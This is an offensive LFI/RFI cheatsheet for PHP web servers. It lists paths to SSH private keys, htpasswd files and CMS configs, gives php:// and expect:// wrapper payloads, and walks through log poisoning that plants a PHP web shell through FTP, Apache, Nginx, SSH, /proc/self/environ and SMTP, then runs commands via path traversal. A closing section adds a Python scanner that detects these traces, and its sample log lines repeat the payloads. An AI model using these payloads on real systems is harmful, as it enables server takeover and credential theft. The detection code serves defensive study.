LFI / RFI Cheatsheet
Passwords, Credentials, PHP Wrappers & Log Poisoning
Passwords & Credentials
SSH
/var/lib/username/.ssh/id_rsa
/home/username/.ssh/id_rsa
Apache
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/etc/apache2/htpasswd
/etc/apache2/.htpasswd
/etc/apache/.htpasswd
/etc/apache2/apache2.conf
CMS
WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php
XAMPP
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log
PHP Wrapper
php://filter/convert.base64-encode/resource=
file=expect://whoami
php://input&cmd=whoami
Log Poisoning
FTP
Firstly, you need to be able to access:
../../../../../../../../var/log/vsftpd.log
If this is possible, attempt to log in:
ftp 192.168.x.x
Supply the following name:
Name: <?php system($_GET['cmd']); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/vsftpd.log&cmd=whoami
Apache2 I
Firstly, you need to be able to access:
../../../../../../../../var/log/apache2/access.log
If this is possible, attempt to poison:
nc 192.168.xx.xx 80
Enter the following and press enter:
<?php system($_GET['cmd']); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/apache2/access.log&cmd=whoami
Apache2 II
Firstly, you need to be able to access:
../../../../../../../../var/log/apache2/access.log
If this is possible, attempt to poison within the User-Agent:
<?php system($_GET['cmd']); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/apache2/access.log&cmd=whoami
SSH
Firstly, you need to be able to access:
../../../../../../../../var/log/auth.log
Attempt to login using the following:
ssh '<?php echo system($_GET["cmd"]); exit; ?>'@192.168.x.x
Exit and attempt the below execution:
../../../../../../../../var/log/auth.log&cmd=whoami
Nginx
Firstly, you need to be able to access:
../../../../../../../../var/log/nginx/access.log
Attempt to inject the following:
http://192.168.x.x/file.php?file=<?php system($_GET['cmd']); ?>
Attempt the below execution:
../../../../../../../../var/log/nginx/error.log&cmd=whoami
Environ
Firstly, you need to be able to access:
../../../../../../../../proc/self/environ
If this is possible, attempt to poison within the User-Agent:
<?php system($_GET['cmd']); ?>
Exit and attempt the below execution:
../../../../../../../../proc/self/environ&cmd=whoami
SMTP
Get username first (/etc/passwd)
telnet 192.168.x.x 25
Enter the following:
EHLO andy
VRFY username@localhost
mail from: andy@hack.com
rcpt to: username@localhost
data
Subject: owned
<?php echo system($_REQUEST['cmd']); ?>
Press Enter.
dot (.)
Press Enter.
Exit and attempt the below execution:
../../../../../../../../var/mail/username&cmd=whoami
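Detection
The log poisoning steps above leave two traces: a PHP open tag written into a log line, and a later request whose include parameter points at a log, mail spool, /proc/self/environ or a php:// or expect:// wrapper. The Python scan below flags both; it is an added example, not part of the original cheatsheet, and its regexes, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# PHP open tag anywhere in a log line: the poisoning step.
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)
# Traversal into a log, mail spool or environ, or a PHP stream wrapper:
# the inclusion/execution step.
INCLUDE_TARGET = re.compile(
    r"(?:\.\./)+(?:var/log/|var/mail/|proc/self/environ)"
    r"|(?:php|expect)://", re.I)

def decode(line, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen."""
    for _ in range(rounds):
        new = unquote(line)
        if new == line:
            break
        line = new
    return line

def scan(lines):
    """Return (line_number, rule) pairs for suspicious log lines."""
    findings = []
    for n, raw in enumerate(lines, 1):
        text = decode(raw)
        if PHP_TAG.search(text):
            findings.append((n, "php-tag-in-log"))
        if INCLUDE_TARGET.search(text):
            findings.append((n, "include-of-log-or-wrapper"))
    return findings

# Constructed sample lines (not from a real system).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Jan/2024:10:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '192.0.2.66 - - [01/Jan/2024:10:02:00 +0000] "GET /file.php?file=..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=whoami HTTP/1.1" 200 900 "-" "curl/8.0"',
    'Jan  1 10:03:00 host sshd[411]: Invalid user <?php echo system($_GET["cmd"]); exit; ?> from 192.0.2.66 port 50000',
    '192.0.2.66 - - [01/Jan/2024:10:04:00 +0000] "GET /file.php?file=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex HTTP/1.1" 200 700 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for n, rule in scan(SAMPLE):
        print(f"line {n}: {rule}")
```

The same scan applies to vsftpd.log, auth.log and mail spools, since it matches on the whole line rather than a parsed field.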